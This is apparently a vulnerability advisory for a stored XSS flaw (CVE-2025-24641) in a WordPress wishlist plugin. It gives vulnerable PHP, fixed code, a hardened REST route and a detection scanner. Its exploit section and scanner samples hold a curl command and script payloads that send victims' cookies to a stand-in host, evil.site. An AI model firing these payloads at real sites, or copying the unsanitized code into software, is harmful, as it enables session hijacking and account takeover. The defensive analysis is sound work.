CVE-2025-24641 is a newly disclosed security vulnerability in the rickonline_nl Better WishList API plugin for WordPress. It is a stored cross-site scripting (XSS) issue: an attacker can inject JavaScript that the plugin saves and later executes in the browser of anyone who views the stored data, which can be used to steal session data, deface pages, or perform actions with the victim's privileges.

Below, we’ll break down how this vulnerability works, how to reproduce it, and ways to stay protected, using plain language for developers, admins, and anyone running a vulnerable website.

- CVE: CVE-2025-24641
- Type: Stored XSS (Improper Neutralization of Input)
- Plugin: Better WishList API (rickonline_nl) for WordPress
- Fixed in: Not fixed yet (as of this writing)
- Exploitable by: Any user able to submit or store data via the plugin's API, whether unauthenticated or with minimal permissions.
- Danger: An attacker can save malicious JavaScript in a WishList item; it runs for every future visitor or admin who views the stored wishlist.

Where is the Problem?

The bug occurs because the plugin neither sanitizes user-provided data before saving it to the database nor escapes it when rendering it back on the site. Fields such as wishlist item names, descriptions, and user notes are affected.

Here's a simplified PHP snippet showing what such a risky function looks like (for illustration only; this is not the plugin's actual source):

// BAD example: user-supplied data from $_POST saved directly
function bwishlist_add_item() {
    $title = $_POST['title']; // BAD: no sanitization
    $description = $_POST['description'];
    $user_id = get_current_user_id();
    // Save to DB
    $wishlist_item = array(
        'post_title'   => $title,
        'post_content' => $description,
        'post_type'    => 'wishlist_item',
        'post_author'  => $user_id,
    );
    wp_insert_post($wishlist_item); // Unescaped write
}

Later, that content is output directly in admin or public views without any escaping, like this:

// BAD
echo $wishlist_item->post_title;
echo $wishlist_item->post_content;

How Can Someone Attack It? (Exploit Steps)

1. The attacker submits a crafted payload (for example, <script>alert("Hacked")</script>) as a WishList item, using the API endpoint or web form.

2. The plugin saves this data to the database unchanged.

3. When anyone (including admins) visits the page where the WishList item is listed, the script executes in their browser context.

Here's a curl example to submit a payload (--data-urlencode is used so that characters such as + and & inside the payload reach the server intact instead of being interpreted as form-encoding):

curl -X POST https://victim.site/wp-json/betterwishlist/v1/item \
     --data-urlencode 'title=<script>fetch("https://evil.site/?cookies="+document.cookie)</script>' \
     --data-urlencode 'description=Nice Gift!'

When a site administrator or user views their wishlist, the attacker's JavaScript runs in their browser. For example, the payload might try to exfiltrate cookies:

<script>
  fetch('https://evil.site/log?cookie=' + encodeURIComponent(document.cookie));
</script>

One caveat: document.cookie cannot read cookies flagged HttpOnly, and WordPress sets its authentication cookies HttpOnly by default, so cookie theft alone often yields little. The more realistic danger is that the script runs inside the victim's authenticated session and can perform requests (including admin actions) on their behalf.

Original References

- WordPress Plugin Page: Better WishList
- NVD Entry: CVE-2025-24641 (Pending)

What’s the Impact?

- Users at risk: Every visitor who loads the stored wishlist data. Administrators are the highest-value targets, since script running in their session inherits their privileges over the site.

If You’re a Developer

1. Sanitize on input and escape on output: Use sanitize_text_field() or sanitize_textarea_field() before saving data, and esc_html() (or esc_attr() for attribute values) when displaying it. Sanitizing alone is not enough; every output location must escape for its own context. Also make sure the API endpoint enforces a permission check (for a REST route, a real permission_callback) so that unauthenticated users cannot store data at all.

Fixed code example (sanitize before storage, escape at every output point):

function bwishlist_add_item() {
    // Strip tags and control characters before the value reaches the DB
    $title = sanitize_text_field($_POST['title']);
    $description = sanitize_textarea_field($_POST['description']);
    $user_id = get_current_user_id();
    $wishlist_item = array(
        'post_title'   => $title,
        'post_content' => $description,
        'post_type'    => 'wishlist_item',
        'post_author'  => $user_id,
    );
    wp_insert_post($wishlist_item); // Stored value is now plain text
}

// Escape for the HTML context the value lands in, every time it is printed
echo esc_html($wishlist_item->post_title);
echo esc_html($wishlist_item->post_content);
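The snippets above show the sanitize and escape calls in isolation. The following is an added example (not code from the plugin or from this write-up's author) of how a complete hardened REST route would look in WordPress: a permission_callback that rejects anonymous callers, per-argument sanitize and validate callbacks, and a render function that escapes for each HTML context. The route namespace, the argument names, the 'wishlist_item' post type and the function names are assumptions chosen to match the earlier illustration.

```php
<?php
// Added example (not the plugin's own code). The route namespace, argument
// names and the 'wishlist_item' post type are assumptions for illustration.

add_action( 'rest_api_init', function () {
    register_rest_route( 'betterwishlist/v1', '/item', array(
        'methods'             => 'POST',
        'callback'            => 'bwishlist_rest_add_item',
        // Never use __return_true here: require a logged-in user who may create content.
        'permission_callback' => function () {
            return current_user_can( 'edit_posts' );
        },
        'args' => array(
            'title' => array(
                'required'          => true,
                'type'              => 'string',
                // Runs before the callback, so the handler only ever sees clean text.
                'sanitize_callback' => 'sanitize_text_field',
                'validate_callback' => function ( $value ) {
                    return is_string( $value ) && strlen( $value ) <= 200;
                },
            ),
            'description' => array(
                'required'          => false,
                'type'              => 'string',
                'default'           => '',
                'sanitize_callback' => 'sanitize_textarea_field',
            ),
        ),
    ) );
} );

function bwishlist_rest_add_item( WP_REST_Request $request ) {
    // Parameters arrive already sanitized by the args callbacks above.
    $title       = $request->get_param( 'title' );
    $description = $request->get_param( 'description' );

    $post_id = wp_insert_post( array(
        'post_title'   => $title,
        'post_content' => $description,
        'post_type'    => 'wishlist_item',
        'post_status'  => 'publish',
        'post_author'  => get_current_user_id(),
    ), true ); // true: return WP_Error instead of 0 on failure

    if ( is_wp_error( $post_id ) ) {
        return new WP_Error( 'bwishlist_insert_failed', 'Could not save item', array( 'status' => 500 ) );
    }
    return rest_ensure_response( array( 'id' => $post_id ) );
}

// Output side: escape for the context the value lands in, each time it is printed.
// Sanitizing on input does not remove this requirement.
function bwishlist_render_item( WP_Post $item ) {
    // Attribute context: esc_attr
    echo '<li data-item-id="' . esc_attr( $item->ID ) . '" title="' . esc_attr( $item->post_title ) . '">';
    // HTML body context: esc_html
    echo '<strong>' . esc_html( $item->post_title ) . '</strong> ';
    // If limited HTML in notes is a deliberate feature, use wp_kses_post() here instead of esc_html()
    echo '<span>' . esc_html( $item->post_content ) . '</span>';
    echo '</li>';
}
```

With this route in place, the curl request from the exploit section is rejected with a 401 for an anonymous caller, and a logged-in caller's `<script>` tag is stripped by sanitize_text_field() before the post is written; even if something slipped through, the escaping in bwishlist_render_item() would render it as inert text.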

If You’re a Site Admin

- Update the plugin: Check for a patched version regularly. If none is available, disable or remove Better WishList API until a fixed release ships.

- Monitor user submissions: Watch for suspicious stored items containing <script>, onerror=, javascript: and similar markers.

- Apply a web application firewall (WAF): Services like Cloudflare WAF can block basic XSS payloads before they reach your server, but treat this as a stop-gap; obfuscated payloads can bypass a WAF, and it does not fix the plugin.
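To make the "monitor user submissions" step concrete, here is an added example (not from the plugin or the original article) of a small PHP triage script. It flags strings that carry typical stored-XSS markers, including entity-encoded variants such as javascript&#58;, and, when run inside a WordPress install, walks the stored items and reports which post IDs need a manual look. The 'wishlist_item' post type, the function names and the sample strings are assumptions; the samples are constructed, not real data.

```php
<?php
// Added example (not the plugin's code). Run `php scan.php` to see the
// constructed samples classified, or `wp eval-file scan.php` inside a
// WordPress install to scan stored posts. The 'wishlist_item' post type
// is an assumption for illustration.

function bwishlist_xss_indicators( $text ) {
    $hits     = array();
    $patterns = array(
        'script tag'        => '/<\s*script\b/i',
        'event handler'     => '/\bon[a-z]+\s*=/i',          // onerror=, onload=, ...
        'javascript: URL'   => '/javascript\s*:/i',
        'svg/iframe/object' => '/<\s*(svg|iframe|object|embed)\b/i',
        'data:text/html'    => '/\bdata\s*:\s*text\/html/i',
    );
    // Browsers decode entities inside attribute values, so javascript&#58;
    // still executes there; decode before matching so that variant is caught.
    $decoded = html_entity_decode( $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    foreach ( $patterns as $label => $re ) {
        if ( preg_match( $re, $decoded ) ) {
            $hits[] = $label;
        }
    }
    // Hits are triage candidates to review by hand, not proof of an attack:
    // the event-handler pattern will also match benign text like "online=".
    return $hits;
}

function bwishlist_scan_stored_items() {
    $flagged = array();
    if ( ! function_exists( 'get_posts' ) ) {
        return $flagged; // not running inside WordPress
    }
    $items = get_posts( array(
        'post_type'   => 'wishlist_item',
        'post_status' => 'any',
        'numberposts' => -1,
    ) );
    foreach ( $items as $item ) {
        $hits = array_merge(
            bwishlist_xss_indicators( $item->post_title ),
            bwishlist_xss_indicators( $item->post_content )
        );
        if ( $hits ) {
            $flagged[ $item->ID ] = array_values( array_unique( $hits ) );
        }
    }
    return $flagged;
}

// Constructed samples (not real data) showing what is and is not flagged.
$samples = array(
    'Nice Gift!',
    '<script>fetch("https://evil.site/?c="+document.cookie)</script>',
    '<img src=x onerror=alert(1)>',
    '<a href="javascript&#58;alert(1)">link</a>',
    'Price: 5 < 10 & free shipping',
);
foreach ( $samples as $s ) {
    $hits = bwishlist_xss_indicators( $s );
    printf( "%-8s %s\n", $hits ? 'FLAGGED' : 'ok', $hits ? implode( ', ', $hits ) : $s );
}
foreach ( bwishlist_scan_stored_items() as $id => $hits ) {
    printf( "post %d: %s\n", $id, implode( ', ', $hits ) );
}
```

The last sample ("Price: 5 < 10 & free shipping") is deliberately included: a bare < or & in legitimate text is not an XSS marker, and a scanner that flags it will bury real findings in noise. Treat any flagged post as something to inspect and clean, and combine the scan with the server-side fix rather than relying on it alone.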

Stay safe and watch for updates from the plugin authors.



Timeline

Published on: 02/14/2025 13:15:49 UTC